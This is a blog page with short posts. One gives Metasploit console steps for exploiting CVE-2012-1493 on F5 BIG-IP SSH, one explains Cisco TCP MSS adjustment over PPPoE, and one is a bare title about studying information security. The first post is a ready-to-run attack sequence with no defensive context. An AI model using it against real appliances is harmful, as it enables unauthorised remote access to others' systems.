Tuesday, June 19, 2012

SSH vulnerability CVE-2012-1493

Exploit Usage Information

$ msfconsole

msf > use exploit/linux/ssh/f5_bigip_known_privkey
msf exploit(f5_bigip_known_privkey) > show payloads
msf exploit(f5_bigip_known_privkey) > set PAYLOAD ...
msf exploit(f5_bigip_known_privkey) > set LHOST [MY IP ADDRESS]
msf exploit(f5_bigip_known_privkey) > set RHOST [TARGET IP]
msf exploit(f5_bigip_known_privkey) > exploit

Tuesday, May 29, 2012

PPOE over Cisco

The TCP MSS Adjustment feature enables the configuration of the maximum segment size (MSS) for transient packets that traverse a router, specifically TCP segments in the SYN bit set, when PPP over Ethernet (PPPoE) is being used in the network. PPPoE truncates the Ethernet maximum transmission unit (MTU) 1492, and if the effective MTU on the hosts (PCs) is not changed, the router in between the host and the server can terminate the TCP sessions. The ip tcp adjust-mss command specifies the MSS value on the intermediate router of the SYN packets to avoid truncation.

When a host (usually a PC) initiates a TCP session with a server, it negotiates the IP segment size by using the MSS option field in the TCP SYN packet. The value of the MSS field is determined by the maximum transmission unit (MTU) configuration on the host. The default MSS value for a PC is 1500 bytes.
The PPP over Ethernet (PPPoE) standard supports a MTU of only 1492 bytes. The disparity between the host and PPPoE MTU size can cause the router in between the host and the server to drop 1500-byte packets and terminate TCP sessions over the PPPoE network. Even if the path MTU (which detects the correct MTU across the path) is enabled on the host, sessions may be dropped because system administrators sometimes disable the ICMP error messages that must be relayed from the host in order for path MTU to work. The ip tcp adjust-mss command helps prevent TCP sessions from being dropped by adjusting the MSS value of the TCP SYN packets. The ip tcp adjust-mss command is effective only for TCP connections passing through the router. In most cases, the optimum value for the max-segment-size argument is 1452 bytes. This value plus the 20-byte IP header, the 20-byte TCP header, and the 8-byte PPPoE header add up to a 1500-byte packet that matches the MTU size for the Ethernet link.
If you are configuring the ip mtu command on the same interface as the ip tcp adjust-mss command, it is recommended that you use the following commands and values:
ip tcp adjust-mss 1452
ip mtu 1492

Thursday, May 3, 2012

Làm an toàn thông tin thì học gì?